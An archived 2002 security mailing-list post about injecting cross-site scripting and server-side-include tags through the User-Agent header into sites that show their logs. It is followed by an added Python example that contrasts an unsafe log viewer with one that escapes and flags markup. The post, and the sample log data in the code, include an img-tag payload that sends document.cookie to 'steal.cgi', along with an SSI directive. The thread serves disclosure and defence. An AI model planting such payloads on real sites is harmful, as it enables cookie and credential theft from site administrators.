Vulnerability Development mailing list archives
Re: XSS And Headers...
From: zeno <bugtraq () cgisecurity net>
Date: Sat, 25 May 2002 16:21:50 -0400 (EDT)
normally it would contain something like... Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705) .. but with a proxy prog (I use Proxomitron) you can change it to whatever you like.. for example: <img src="x.jpg" onError="this.src='steal.cgi?document.cookie';"> and if the site logs it, you just got the administrator's password :) Now, I'm yet to come across any sites that this works on because I just thought of it this afternoon, but let me know if it works :) In any case, a lot of sites would log/store this kind of information so it should be fixed.
A hole in Analog and W3perl suffered from this problem. I'm sure other software does. I have personally found an example of SSI tag inserting using this method on 1 website running "product unknown". I inserted SSI into the User agent field and visited the site, which displayed the logs in an SSI page. It executed the SSI tag that I inserted.

I just wrote a paper on cookie theft with XSS that may be worth a peek to you.
www.cgisecurity.com/articles/xss-faq.shtml

Also see
http://www.cgisecurity.net/papers/header-based-exploitation.txt

- zeno () cgisecurity com
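The log-viewer problem discussed in this thread, shown from the fixing side as an added example (not code from the original posts, Analog or W3perl): a report generator that copies the User-Agent into HTML verbatim, next to one that encodes it on output. It assumes Apache "combined" log lines with embedded quotes written as `\"`; the function names and the sample lines, including the harmless SSI `echo` directive, are constructed for illustration.

```python
import html
import re

# Constructed sample lines (Apache "combined" format, quotes logged as \").
SAMPLE_LOG = r'''192.0.2.10 - - [25/May/2002:16:00:01 -0400] "GET / HTTP/1.0" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
192.0.2.11 - - [25/May/2002:16:00:02 -0400] "GET / HTTP/1.0" 200 512 "-" "<img src=\"x.jpg\" onError=\"this.src='steal.cgi?document.cookie';\">"
192.0.2.12 - - [25/May/2002:16:00:03 -0400] "GET / HTTP/1.0" 200 512 "-" "<!--#echo var=\"DATE_LOCAL\" -->"
'''.splitlines()

QUOTED = r'"((?:[^"\\]|\\.)*)"'  # quoted field that may contain \" escapes
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + '$')
FIELDS = ("host", "time", "request", "status", "referer", "agent")

def parse(line):
    """Split one combined-format line into a dict, or None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = dict(zip(FIELDS, m.groups()))
    for key in ("request", "referer", "agent"):
        rec[key] = re.sub(r'\\(["\\])', r'\1', rec[key])  # undo \" and \\
    return rec

def render_row_unsafe(rec):
    # The flawed pattern: a client-supplied header copied into the page verbatim.
    return "<tr><td>%s</td><td>%s</td></tr>" % (rec["host"], rec["agent"])

def render_row_safe(rec):
    # Encode on output: <, >, &, " and ' become entities, so the browser sees no
    # tag and an SSI-enabled server sees no "<!--#" directive.
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(rec["host"]), html.escape(rec["agent"]))

def flag_markup(rec):
    """Names of client-controlled fields that contain markup characters."""
    return [k for k in ("referer", "agent") if re.search(r"[<>]", rec[k])]

def report(lines):
    recs = [r for r in map(parse, lines) if r]
    return {"rows": [render_row_safe(r) for r in recs],
            "flagged": [(r["host"], flag_markup(r)) for r in recs if flag_markup(r)]}

if __name__ == "__main__":
    result = report(SAMPLE_LOG)
    print("\n".join(result["rows"]))
    print("flagged:", result["flagged"])
```

The ordinary browser string renders identically through both functions; only the two entries carrying markup change, and `report` lists them for review.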